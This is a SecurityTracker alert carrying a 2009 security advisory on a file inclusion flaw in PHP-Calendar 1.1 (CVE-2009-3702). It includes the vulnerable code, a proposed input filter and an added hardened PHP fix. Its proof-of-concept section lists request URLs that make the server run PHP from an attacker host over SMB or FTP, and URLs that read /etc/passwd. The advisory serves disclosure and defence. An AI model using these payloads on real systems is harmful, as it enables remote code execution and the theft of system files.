SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Calendar)  >   PHP-Calendar Vendors:   php-calendar.sourceforge.net
PHP-Calendar Include File Bug in 'configfile' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1023375
SecurityTracker URL:  http://securitytracker.com/id/1023375
CVE Reference:   CVE-2009-3702
Updated:  Dec 21 2009
Original Entry Date:  Dec 21 2009
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1, possibly other versions
Description:   Juan Galiana Lara from Internet Security Auditors reported a vulnerability in PHP-Calendar. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'configfile' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Systems configured with the allow_url_fopen directive set to 'on' are affected.

The vendor was notified on October 13, 2009, without response.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  php-calendar.sourceforge.net/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] [ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-011
- Original release date: October 13th, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3702
- Severity: 8.5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion
vulnerability

II. BACKGROUND
-------------------------
PHP-Calendar is a simple web calendar. It is targeted towards groups
that need to collaboratively create and track events. In that same
collaborative spirit, the source for PHP-Calendar is available under
an open source license for anyone to use and modify.

III. DESCRIPTION
-------------------------
The 'configfile' variable is not properly filtered, so it is possible to
include arbitrary remote and local files. This attack may lead to the
execution of arbitrary code.

The snippet of vulnerable code (part of the update08.php and update10.php
files):

    36  } elseif(!empty($_GET['configfile'])) {
    37          if(file_exists($_GET['configfile'])) {
    38                  require_once($_GET['configfile']);

Including remote files requires the allow_url_fopen directive to be set
to 'On'. There are two cases in which remote code execution is possible
because the file_exists() check can be bypassed:

1) If the victim server is running the Windows operating system and no
firewall filters outgoing SMB requests, an attacker can use a URL such
as //servername/path/to/file.php
2) If the server is running a PHP version > 5.0.0 (the most common case),
an attacker can use the FTP/FTPS protocol for the inclusion, e.g.
ftp://servername/path/to/file.php. See the references for more information.

IV. PROOF OF CONCEPT
-------------------------
For including remote files:

http://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
http://site/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php
http://site/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
http://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php

For local files, this PoC will display the /etc/passwd file:

http://site/php-calendar-1.1/update08.php?configfile=/etc/passwd
http://site/php-calendar-1.1/update10.php?configfile=/etc/passwd

V. BUSINESS IMPACT
-------------------------
Unauthenticated users can view any local file in the filesystem and
could execute arbitrary code remotely.

VI. SYSTEMS AFFECTED
-------------------------
PHP-Calendar version 1.1 is vulnerable; other versions may be affected.

VII. SOLUTION
-------------------------
Change the code of update08.php (line 38) and update10.php (line 35)
so that the $_GET['configfile'] variable is filtered before it is
included:

    /* Only a bare identifier is accepted: no path separators, no
       scheme prefix such as ftp://, no UNC path. ereg() is deprecated
       as of PHP 5.3; preg_match() accepts the same pattern. */
    if (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile'])) {
        require_once($_GET['configfile']);
    }

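A hardened form of the include, as an added example that is not PHP-Calendar's own code: it keeps the advisory's identifier whitelist, maps the name onto a fixed configuration directory and checks the resolved path with realpath(), so the proof-of-concept values above are rejected before file_exists() or require_once() ever sees them. The config directory and the helper name are assumptions.

```php
<?php
// Added example, not PHP-Calendar's own code: a hardened replacement for the
// `if (file_exists($_GET['configfile'])) require_once($_GET['configfile']);`
// pattern in update08.php / update10.php. Assumed layout: config files live
// under CONFIG_DIR and are referenced by bare name; the helper name and the
// directory are hypothetical.

const CONFIG_DIR = __DIR__ . '/config';

/**
 * Map a user-supplied config name to a file under CONFIG_DIR, or return null.
 * Only a bare identifier is accepted, so stream wrappers (ftp://, http://),
 * UNC paths (//host/share, \\host\share) and absolute or traversal paths
 * (/etc/passwd, ../x) never reach file_exists() or require_once().
 */
function resolve_config_file(string $name): ?string
{
    // Same character class as the advisory's proposed filter, using
    // preg_match() instead of the deprecated ereg().
    if (!preg_match('/^[A-Za-z0-9_]+$/', $name)) {
        return null;
    }
    $base = realpath(CONFIG_DIR);
    $real = realpath(CONFIG_DIR . '/' . $name . '.php');
    // realpath() resolves symlinks and returns false for a missing file;
    // the result must still sit inside CONFIG_DIR.
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed inputs mirroring the advisory's proof-of-concept values.
$samples = [
    'site',                                    // accepted only if config/site.php exists
    '//servername/path/to/file.php',           // SMB/UNC path: rejected
    'ftp://guest:pass@site/path/to/file.php',  // FTP wrapper: rejected
    '\\\\ip\\path\\to\\file.php',              // Windows UNC path: rejected
    '/etc/passwd',                             // absolute local path: rejected
    '../update08.php',                         // traversal: rejected
];
foreach ($samples as $s) {
    $path = resolve_config_file($s);
    printf("%-42s => %s\n", $s, $path === null ? 'rejected' : "ok: $path");
}
```

In update08.php and update10.php the elseif branch would call resolve_config_file((string) $_GET['configfile']) and require_once the result only when it is not null.
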
VIII. REFERENCES
-------------------------
http://www.php-calendar.com/
http://www.php.net/manual/en/wrappers.ftp.php
http://www.isecauditors.com/

IX. CREDITS
-------------------------
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
October   13, 2009: Initial release.
October   19, 2009: Added CVE id.
December  18, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
October   13, 2009: Vulnerability discovered by
                    Internet Security Auditors (www.isecauditors.com)
October   13, 2009: Sent to developers. No response.
December  13, 2009: Contacted again. No response.
December  18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
